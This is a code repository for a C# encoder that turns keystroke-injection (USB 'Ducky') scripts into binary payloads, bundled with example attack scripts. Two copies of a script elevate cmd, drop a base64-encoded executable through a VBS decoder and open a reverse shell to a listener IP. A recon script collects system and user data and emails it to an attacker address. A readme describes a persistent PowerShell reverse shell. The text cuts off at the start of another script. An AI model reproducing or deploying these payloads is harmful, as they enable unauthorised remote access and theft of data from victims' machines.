private System.Windows.Forms.Label label1; 126 | private System.Windows.Forms.Button button1; 127 | private System.Windows.Forms.TextBox textBox1; 128 | private System.Windows.Forms.Button button2; 129 | private System.Windows.Forms.Button button3; 130 | private System.Windows.Forms.Label label2; 131 | } 132 | } 133 | 134 | -------------------------------------------------------------------------------- /Encoder/Form1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Text; 7 | using System.Windows.Forms; 8 | using System.IO; 9 | 10 | namespace DuckyEncoder 11 | { 12 | public partial class frm_Main : Form 13 | { 14 | public frm_Main() 15 | { 16 | InitializeComponent(); 17 | } 18 | 19 | String ScriptToExecute = ""; 20 | BinaryWriter dataStreamWriter; 21 | String mapType = "US"; 22 | 23 | #region "Command Processing" 24 | 25 | private void processLine(String comline) 26 | { 27 | String[] parts; 28 | if (comline.StartsWith("STRING")) 29 | { 30 | //Send the string chars one at a time 31 | String resultant = comline.Substring(7); 32 | sendData(resultant); 33 | return; 34 | } 35 | else if (comline.StartsWith("DELAY")) 36 | { 37 | //Wait given millsecs 38 | int delTime = Convert.ToInt32(comline.Substring(6)); 39 | if (delTime > 0) 40 | { 41 | sendData(0xff); //delay command code 42 | int d = delTime; 43 | int dex = 0; 44 | //in units of 50ms 45 | while (d > 0) 46 | { 47 | dex++; 48 | d = d - 50; 49 | } 50 | sendData(dex); 51 | sendData(0x32); 52 | } 53 | return; 54 | } 55 | else if(comline.StartsWith("REM")) 56 | { 57 | //Remark line - just ignore it. 58 | return; 59 | } 60 | else if (comline.StartsWith("ENTER")) 61 | { 62 | //Send a Return 63 | byte k = (byte)176; //'B0' 64 | sendData(k); 65 | return; 66 | } 67 | else if (comline.StartsWith("COMD")) 68 | { 69 | //Send full command line plus return 70 | String resultant = comline.Substring(5); 71 | sendCommandData(resultant); 72 | return; 73 | } 74 | else if (comline.StartsWith("KEY")) 75 | { 76 | //Send a windows ALT key combo (eg. 'ALT + 0124') 77 | //Windows ALT keys( 78 | sendData(252 & 0xff); 79 | //numberpad keys inputs 80 | String nums = comline.Substring(4); 81 | nums = nums.Replace(" ", ""); 82 | nums = nums.Replace(System.Environment.NewLine, ""); 83 | char[] bc = nums.ToCharArray(); 84 | for (int x = 0; x < nums.Length; x++) 85 | { 86 | int ky = getNumericPad(bc[x]); 87 | sendData(ky & 0xff); 88 | } 89 | //signal sequence end 90 | sendData(253 & 0xff); 91 | return; 92 | } 93 | else if (comline.StartsWith("MAP")) 94 | { 95 | String typx = comline.Substring(4); 96 | typx = typx.Replace(" ", ""); 97 | typx = typx.Replace(System.Environment.NewLine, ""); 98 | mapType = typx; 99 | return; 100 | } 101 | else if (comline.StartsWith("WAITKEY")) 102 | { 103 | //Alter default key 'down' time in msecs 104 | String typx = comline.Substring(7); 105 | typx = typx.Replace(" ", ""); 106 | typx = typx.Replace(System.Environment.NewLine, ""); 107 | int del = Convert.ToInt32(typx); 108 | if(del > 4 && del < 251) 109 | { 110 | sendData(250 & 0xff); 111 | sendData(del & 0xff); 112 | return; 113 | } 114 | } 115 | else 116 | { 117 | //Compound Command or Special Key 118 | String[] dif = new String[] { "+" }; 119 | if (comline.IndexOf(dif[0]) > 0) 120 | { 121 | //Multi-Key Special Character 122 | comline = comline.Replace("\\r?\\n", ""); 123 | parts = comline.Split(dif, StringSplitOptions.RemoveEmptyEntries); 124 | 125 | sendData(251 & 0xff); //signal multi start 126 | foreach (String part in parts) 127 | { 128 | String mako = part.Replace(" ", ""); 129 | if (getKeyCode(mako) > 0) 130 | { 131 | sendData(getKeyCode(mako) & 0xff); 132 | } 133 | else 134 | { 135 | sendData(mako); 136 | } 137 | } 138 | sendData(254 & 0xff); //signal multi end 139 | return; 140 | } 141 | else 142 | { 143 | //Single Special Key 144 | parts = new String[1]; 145 | parts[0] = comline.ToString(); 146 | String sect = parts[0].Replace(" ", ""); 147 | if (getKeyCode(sect) > 0) 148 | { 149 | sendData(getKeyCode(sect) & 0xff); 150 | } 151 | return; 152 | } 153 | 154 | } 155 | } 156 | private int getKeyCode(String subcom) 157 | { 158 | //Get the correct keycode 159 | int resultant = 0; 160 | int keyVal = -1; 161 | switch (subcom) 162 | { 163 | case "CTRL": 164 | resultant = 128; 165 | break; 166 | case "SHIFT": 167 | //left shifttest 168 | resultant = 129; 169 | break; 170 | case "ALT": 171 | resultant = 130; 172 | break; 173 | case "TAB": 174 | resultant = 179; 175 | break; 176 | case "GUI": 177 | //left GUI (windows) 178 | resultant = 131; 179 | break; 180 | case "GUI_R": 181 | resultant = 135; 182 | break; 183 | case "ESC": 184 | resultant = 177; 185 | break; 186 | case "MENU": 187 | resultant = 237; 188 | break; 189 | case "BACKSPACE": 190 | resultant = 178; 191 | break; 192 | case "INS": 193 | resultant = 209; 194 | break; 195 | case "DEL": 196 | resultant = 212; 197 | break; 198 | case "HOME": 199 | resultant = 210; 200 | break; 201 | case "ALTGR": 202 | resultant = 134; 203 | break; 204 | case "CTRLR": 205 | resultant = 132; 206 | break; 207 | case "SHIFTR": 208 | resultant = 133; 209 | break; 210 | case "F1": 211 | resultant = 194; 212 | break; 213 | case "F2": 214 | resultant = 195; 215 | break; 216 | case "F3": 217 | resultant = 196; 218 | break; 219 | case "F4": 220 | resultant = 197; 221 | break; 222 | case "F5": 223 | resultant = 198; 224 | break; 225 | case "F6": 226 | resultant = 199; 227 | break; 228 | case "F7": 229 | resultant = 200; 230 | break; 231 | case "F8": 232 | resultant = 201; 233 | break; 234 | case "F9": 235 | resultant = 202; 236 | break; 237 | case "F10": 238 | resultant = 203; 239 | break; 240 | case "F11": 241 | resultant = 204; 242 | break; 243 | case "F12": 244 | resultant = 205; 245 | break; 246 | case "CAPS_LOCK": 247 | resultant = 193; 248 | break; 249 | case "PAGE_UP": 250 | resultant = 211; 251 | break; 252 | case "PAGE_DOWN": 253 | resultant = 214; 254 | break; 255 | case "UP": 256 | resultant = 218; 257 | break; 258 | case "DWN": 259 | resultant = 217; 260 | break; 261 | case "LFT": 262 | resultant = 216; 263 | break; 264 | case "RHT": 265 | resultant = 215; 266 | break; 267 | default: 268 | resultant = keyVal; 269 | break; 270 | } 271 | return (resultant); 272 | } 273 | private char replaceKey(char inp) 274 | { 275 | //Needed because of the keycode differences between 276 | //US and UK keyboards. Others are not supported 277 | char repKey = inp; 278 | switch (mapType) 279 | { 280 | case "UK": 281 | switch ((int)inp) 282 | { 283 | case 64: 284 | //@ 285 | repKey = (char)34; 286 | break; 287 | case 34: 288 | // " 289 | repKey = (char)64; 290 | break; 291 | case 35: 292 | //# 293 | repKey = (char)186; 294 | break; 295 | case 126: 296 | //~ 297 | repKey = (char)124; 298 | break; 299 | case 47: 300 | // Forward slash (/) 301 | repKey = (char)192; 302 | break; 303 | case 92: 304 | // Back slash (\) 305 | repKey = (char)0xec; 306 | break; 307 | default: 308 | repKey = inp; 309 | break; 310 | } 311 | 312 | return (repKey); 313 | } 314 | return (repKey); 315 | } 316 | 317 | int getNumericPad(char inx) 318 | { 319 | //Ruturn the corresponding numeric pad 320 | //keycode 321 | int vx = (int)inx; 322 | if (vx > 48) 323 | { 324 | vx = vx - 48; 325 | return (vx + 224); 326 | } 327 | else 328 | { 329 | return (234); 330 | } 331 | } 332 | #endregion 333 | 334 | 335 | #region "Stream IO methods" 336 | void sendCommandData(String inputx) 337 | { 338 | try 339 | { 340 | String msg = inputx; 341 | msg += "\n"; 342 | foreach (byte b in msg.ToCharArray()) 343 | { 344 | if (mapType == "UK" && b == 0x7C) 345 | { 346 | sendUKPipe(); 347 | } 348 | else 349 | { 350 | byte k = (byte)replaceKey((char)(b & 0xff)); 351 | dataStreamWriter.Write((sbyte)k); 352 | } 353 | } 354 | } 355 | catch (Exception ex) 356 | { 357 | errDisp(ex); 358 | } 359 | } 360 | 361 | private void sendData(String inpx) 362 | { 363 | try 364 | { 365 | foreach (byte b in inpx.ToCharArray()) 366 | { 367 | if (mapType == "UK" && b == 0x7C) 368 | { 369 | sendUKPipe(); 370 | } 371 | else 372 | { 373 | char t = replaceKey((char)b); 374 | dataStreamWriter.Write((sbyte)t); 375 | } 376 | } 377 | } 378 | catch (Exception ex) 379 | { 380 | errDisp(ex); 381 | } 382 | } 383 | 384 | private void sendData(byte inx) 385 | { 386 | try 387 | { 388 | if (mapType == "UK" && inx == 0x7C) 389 | { 390 | sendUKPipe(); 391 | } 392 | else 393 | { 394 | dataStreamWriter.Write((sbyte)inx); 395 | } 396 | } 397 | catch (Exception ex) 398 | { 399 | errDisp(ex); 400 | } 401 | } 402 | 403 | private void sendData(int ipx) 404 | { 405 | try 406 | { 407 | ipx = ipx & 0xff; 408 | dataStreamWriter.Write((sbyte)ipx); 409 | } 410 | catch (Exception ex) 411 | { 412 | errDisp(ex); 413 | } 414 | } 415 | 416 | private void sendUKPipe() 417 | { 418 | sendData(251 & 0xff); 419 | sendData(129 & 0xff); 420 | sendData(0xec & 0xff); 421 | sendData(254 & 0xff); 422 | } 423 | 424 | #endregion 425 | 426 | 427 | private void encodeScript(String file) 428 | { 429 | //execute a laoded script line by line 430 | try 431 | { 432 | String[] parts = file.Split(new string[1] { System.Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries); 433 | foreach (String part in parts) 434 | { 435 | processLine(part); 436 | } 437 | } 438 | catch (Exception ex) 439 | { 440 | errDisp(ex); 441 | } 442 | } 443 | 444 | private void button2_Click(object sender, EventArgs e) 445 | { 446 | this.Close(); 447 | } 448 | 449 | private void button1_Click(object sender, EventArgs e) 450 | { 451 | //Open the script load screen 452 | this.label2.Text = ""; 453 | openFileDialog1.Multiselect = false; 454 | openFileDialog1.Title = "Load Ducky Script File"; 455 | if (openFileDialog1.ShowDialog() == System.Windows.Forms.DialogResult.OK) 456 | { 457 | try 458 | { 459 | System.IO.StreamReader sr = new 460 | System.IO.StreamReader(openFileDialog1.FileName); 461 | ScriptToExecute = sr.ReadToEnd(); 462 | sr.Close(); 463 | textBox1.Text = openFileDialog1.FileName.ToString(); 464 | this.label2.Text = "PRESS 'ENCODE' TO MAKE SCRIPT"; 465 | this.label2.ForeColor = Color.Blue; 466 | } 467 | catch (Exception ex) 468 | { 469 | errDisp(ex); 470 | } 471 | 472 | } 473 | } 474 | 475 | private void button3_Click(object sender, EventArgs e) 476 | { 477 | if(textBox1.Text.Length > 5) 478 | { 479 | try 480 | { 481 | if (File.Exists("sctipt.bin")) 482 | { 483 | File.Delete("script.bin"); 484 | } 485 | dataStreamWriter = new BinaryWriter(new FileStream("script.bin", FileMode.Create)); 486 | encodeScript(ScriptToExecute); 487 | dataStreamWriter.Close(); 488 | this.label2.Text = "DUCKY SCRIPT GENERATED OK"; 489 | this.label2.ForeColor = Color.Red; 490 | 491 | } 492 | catch (Exception ex) 493 | { 494 | errDisp(ex); 495 | } 496 | } 497 | else 498 | { 499 | this.label2.Text = "PLEASE 'LOAD' A SOURCE FILE ABOVE"; 500 | this.label2.ForeColor = Color.Red; 501 | } 502 | } 503 | 504 | private void errDisp(Exception ex) 505 | { 506 | this.label2.Text = "ERROR"; 507 | this.label2.ForeColor = Color.Red; 508 | MessageBox.Show(ex.Message.ToString()); 509 | 510 | } 511 | 512 | private void frm_Main_Load(object sender, EventArgs e) 513 | { 514 | this.label2.Text = "PRESS 'LOAD' TO SELECT FILE"; 515 | this.label2.ForeColor = Color.Blue; 516 | } 517 | 518 | } 519 | } 520 | -------------------------------------------------------------------------------- /Encoder/Form1.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | -------------------------------------------------------------------------------- /Encoder/Open_NetCat_ReverseShell_8080.txt: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI 3 | DELAY 500 4 | STRING cmd.exe 5 | DELAY 1000 6 | MENU 7 | DELAY 100 8 | STRING a 9 | DELAY 250 10 | ENTER 11 | DELAY 1300 12 | ALT + y 13 | DELAY 1000 14 | STRING copy con c:\decoder.vbs 15 | ENTER 16 | DELAY 1000 17 | STRING Option Explicit 18 | ENTER 19 | STRING Dim arguments, inFile, outFile 20 | ENTER 21 | STRING Set arguments = WScript.Arguments 22 | ENTER 23 | STRING inFile = arguments(0) 24 | ENTER 25 | STRING outFile = arguments(1) 26 | ENTER 27 | STRING Dim base64Encoded, base64Decoded, outByteArray 28 | ENTER 29 | STRING dim objFS 30 | ENTER 31 | STRING dim objTS 32 | ENTER 33 | STRING set objFS = CreateObject("Scripting.FileSystemObject") 34 | ENTER 35 | STRING set objTS = objFS.OpenTextFile(inFile, 1) 36 | ENTER 37 | STRING base64Encoded = objTS.ReadAll 38 | ENTER 39 | STRING base64Decoded = decodeBase64(base64Encoded) 40 | ENTER 41 | STRING writeBytes outFile, base64Decoded 42 | ENTER 43 | STRING private function decodeBase64(base64) 44 | ENTER 45 | STRING dim DM, EL 46 | ENTER 47 | STRING Set DM = CreateObject("Microsoft.XMLDOM") 48 | ENTER 49 | STRING Set EL = DM.createElement("tmp") 50 | ENTER 51 | STRING EL.DataType = "bin.base64" 52 | ENTER 53 | STRING EL.Text = base64 54 | ENTER 55 | STRING decodeBase64 = EL.NodeTypedValue 56 | ENTER 57 | STRING end function 58 | ENTER 59 | STRING private Sub writeBytes(file, bytes) 60 | ENTER 61 | STRING Dim binaryStream 62 | ENTER 63 | STRING Set binaryStream = CreateObject("ADODB.Stream") 64 | ENTER 65 | STRING binaryStream.Type = 1 66 | ENTER 67 | STRING binaryStream.Open 68 | ENTER 69 | STRING binaryStream.Write bytes 70 | ENTER 71 | STRING binaryStream.SaveToFile file, 2 72 | ENTER 73 | STRING End Sub 74 | ENTER 75 | CTRL + z 76 | ENTER 77 | STRING copy con c:\reverse.txt 78 | ENTER 79 | STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA 80 | ENTER 81 | STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA 82 | ENTER 83 | STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA 84 | ENTER 85 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 86 | ENTER 87 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS 88 | ENTER 89 | STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA 90 | ENTER 91 | STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 92 | ENTER 93 | STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A 94 | ENTER 95 | STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA 96 | ENTER 97 | STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA 98 | ENTER 99 | STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq 100 | ENTER 101 | STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF 102 | ENTER 103 | STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv 104 | ENTER 105 | STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp 106 | ENTER 107 | STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm 108 | ENTER 109 | STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A 110 | ENTER 111 | STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s 112 | ENTER 113 | STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 114 | ENTER 115 | STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp 116 | ENTER 117 | STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY 118 | ENTER 119 | STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B 120 | ENTER 121 | STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk 122 | ENTER 123 | STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA 124 | ENTER 125 | STRING AAxAAADpdL7//wAAAAIAAAAMQAAA 126 | ENTER 127 | CTRL + z 128 | ENTER 129 | STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe 130 | ENTER 131 | STRING c:\reverse.exe 192.168.0.17 8080 132 | ENTER 133 | STRING exit 134 | ENTER -------------------------------------------------------------------------------- /Encoder/Output-Build.txt: -------------------------------------------------------------------------------- 1 | 1>------ Rebuild All started: Project: DuckyEncoder, Configuration: Debug Any CPU ------ 2 | 1> DuckyEncoder -> C:\Users\John\documents\visual studio 2013\Projects\DuckyEncoder\DuckyEncoder\bin\Debug\DuckyEncoder.exe 3 | ========== Rebuild All: 1 succeeded, 0 failed, 0 skipped ========== 4 | -------------------------------------------------------------------------------- /Encoder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace DuckyEncoder 6 | { 7 | static class Program 8 | { 9 | /// 10 | /// The main entry point for the application. 11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | Application.Run(new frm_Main()); 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Encoder/UK_KeyboardTest.txt: -------------------------------------------------------------------------------- 1 | MAP UK 2 | DELAY 2000 3 | GUI 4 | DELAY 100 5 | STRING notepad.exe 6 | DELAY 100 7 | ENTER 8 | DELAY 1000 9 | STRING -------------UK Keyboard Character Test------------------- 10 | ENTER 11 | ENTER 12 | DELAY 200 13 | STRING !"$%^&*(){}[]<>:;,.'? 14 | ENTER 15 | STRING 1234567890 16 | ENTER 17 | STRING lower= abcdefghijklmnopqrstuvwxyz 18 | ENTER 19 | STRING upper= ABCDEFGHIJKLMNOPQRSTUVWXYZ 20 | ENTER 21 | DELAY 100 22 | STRING HASH # 23 | ENTER 24 | STRING TILDE ~ 25 | ENTER 26 | STRING PIPE | 27 | ENTER 28 | STRING AT SYMBOL @ 29 | ENTER 30 | STRING BACKSLASH / 31 | ENTER 32 | STRING FORWARD SLASH \ 33 | ENTER 34 | STRING BACKTICK ` 35 | ENTER 36 | STRING SINGLE QUOTE ' 37 | ENTER 38 | STRING DOUBLE QUOTE " 39 | ENTER 40 | STRING WINDOWS 'ALT-0124' TEST 41 | DELAY 50 42 | KEY 0124 43 | ENTER 44 | STRING [Character above should be a 'pipe'] 45 | ENTER 46 | STRING ------------------Test Complete----------------------- 47 | ENTER 48 | -------------------------------------------------------------------------------- /Examples/Open_NetCat_ReverseShell_8080.txt: -------------------------------------------------------------------------------- 1 | REM Test Script - Opens a netcat reverse shell on the target 2 | REM NetCat must be installed on the listener machine and 3 | REM and set running with command 'nc -l 8080' 4 | DELAY 2000 5 | GUI 6 | DELAY 500 7 | STRING cmd.exe 8 | DELAY 1000 9 | MENU 10 | DELAY 100 11 | STRING a 12 | DELAY 250 13 | ENTER 14 | DELAY 1300 15 | ALT + y 16 | DELAY 1000 17 | STRING copy con c:\decoder.vbs 18 | ENTER 19 | DELAY 1000 20 | STRING Option Explicit 21 | ENTER 22 | STRING Dim arguments, inFile, outFile 23 | ENTER 24 | STRING Set arguments = WScript.Arguments 25 | ENTER 26 | STRING inFile = arguments(0) 27 | ENTER 28 | STRING outFile = arguments(1) 29 | ENTER 30 | STRING Dim base64Encoded, base64Decoded, outByteArray 31 | ENTER 32 | STRING dim objFS 33 | ENTER 34 | STRING dim objTS 35 | ENTER 36 | STRING set objFS = CreateObject("Scripting.FileSystemObject") 37 | ENTER 38 | STRING set objTS = objFS.OpenTextFile(inFile, 1) 39 | ENTER 40 | STRING base64Encoded = objTS.ReadAll 41 | ENTER 42 | STRING base64Decoded = decodeBase64(base64Encoded) 43 | ENTER 44 | STRING writeBytes outFile, base64Decoded 45 | ENTER 46 | STRING private function decodeBase64(base64) 47 | ENTER 48 | STRING dim DM, EL 49 | ENTER 50 | STRING Set DM = CreateObject("Microsoft.XMLDOM") 51 | ENTER 52 | STRING Set EL = DM.createElement("tmp") 53 | ENTER 54 | STRING EL.DataType = "bin.base64" 55 | ENTER 56 | STRING EL.Text = base64 57 | ENTER 58 | STRING decodeBase64 = EL.NodeTypedValue 59 | ENTER 60 | STRING end function 61 | ENTER 62 | STRING private Sub writeBytes(file, bytes) 63 | ENTER 64 | STRING Dim binaryStream 65 | ENTER 66 | STRING Set binaryStream = CreateObject("ADODB.Stream") 67 | ENTER 68 | STRING binaryStream.Type = 1 69 | ENTER 70 | STRING binaryStream.Open 71 | ENTER 72 | STRING binaryStream.Write bytes 73 | ENTER 74 | STRING binaryStream.SaveToFile file, 2 75 | ENTER 76 | STRING End Sub 77 | ENTER 78 | CTRL + z 79 | ENTER 80 | STRING copy con c:\reverse.txt 81 | ENTER 82 | STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA 83 | ENTER 84 | STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA 85 | ENTER 86 | STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA 87 | ENTER 88 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 89 | ENTER 90 | STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS 91 | ENTER 92 | STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA 93 | ENTER 94 | STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 95 | ENTER 96 | STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A 97 | ENTER 98 | STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA 99 | ENTER 100 | STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA 101 | ENTER 102 | STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq 103 | ENTER 104 | STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF 105 | ENTER 106 | STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv 107 | ENTER 108 | STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp 109 | ENTER 110 | STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm 111 | ENTER 112 | STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A 113 | ENTER 114 | STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s 115 | ENTER 116 | STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 117 | ENTER 118 | STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp 119 | ENTER 120 | STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY 121 | ENTER 122 | STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B 123 | ENTER 124 | STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk 125 | ENTER 126 | STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA 127 | ENTER 128 | STRING AAxAAADpdL7//wAAAAIAAAAMQAAA 129 | ENTER 130 | CTRL + z 131 | ENTER 132 | STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe 133 | ENTER 134 | REM ----------------------------------------------------------- 135 | REM Change the listening machine address here 136 | STRING c:\reverse.exe 192.168.0.17 8080 137 | REM ----------------------------------------------------------- 138 | ENTER 139 | STRING exit 140 | ENTER -------------------------------------------------------------------------------- /Examples/readme: -------------------------------------------------------------------------------- 1 | Here are a number of script examples. 2 | 3 | The textSheel example is a fully working TCP Reverse Shell implemented using microsoft Powershell code. 4 | The script actually 'writes' the powershell script, saves it to a file, and then excutes the script. It also sets-up a scheduled job 5 | to execute the script after each reboot of the target machine. The shell will then form a command connection back to the attacker IP 6 | each time the target starts up. 7 | -------------------------------------------------------------------------------- /Examples/recon_script_win7_UK.txt: -------------------------------------------------------------------------------- 1 | REM WIN7 RECON SCRIPT - UK KEYBOARD VERSION 2 | MAP UK 3 | DELAY 2000 4 | GUI 5 | DELAY 800 6 | STRING cmd.exe 7 | DELAY 100 8 | ENTER 9 | DELAY 1000 10 | REM collect some data on the target machine 11 | STRING ipconfig > recon_data.txt & whoami >> recon_data.txt & getmac >> recon_data.txt 12 | DELAY 50 13 | ENTER 14 | DELAY 400 15 | STRING net user >> recon_data.txt & tasklist >> recon_data.txt & DIR Documents >> recon_data.txt 16 | DELAY 50 17 | ENTER 18 | DELAY 400 19 | REM email the recon_data.txt file back to attacker 20 | STRING powershell 21 | ENTER 22 | DELAY 750 23 | STRING $SMTPServer = 'smtp.gmail.com' 24 | ENTER 25 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 26 | ENTER 27 | STRING $SMTPInfo.EnableSsl = $true 28 | ENTER 29 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('hacker@googlemail.com', 'Password$') 30 | ENTER 31 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 32 | ENTER 33 | STRING $ReportEmail.From = 'hacker@googlemail.com' 34 | ENTER 35 | STRING $ReportEmail.To.Add('hacker@googlemail.com') 36 | ENTER 37 | STRING $ReportEmail.Subject = 'Recon Data Test' 38 | ENTER 39 | STRING $ReportEmail.Body = (Get-Content recon_data.txt | out-string) 40 | ENTER 41 | STRING $SMTPInfo.Send($ReportEmail) 42 | ENTER 43 | DELAY 2000 44 | STRING del recon_data.txt 45 | ENTER 46 | STRING exit 47 | ENTER 48 | DELAY 50 49 | STRING exit 50 | ENTER 51 | 52 | 53 | -------------------------------------------------------------------------------- /Examples/textSheel.txt: -------------------------------------------------------------------------------- 1 | REM open notepad and write the PS code to 'psAuxL.ps1' 2 | MAP UK 3 | DELAY 1500 4 | GUI 5 | DELAY 1000 6 | STRING notepad.exe 7 | ENTER 8 | DELAY 2000 9 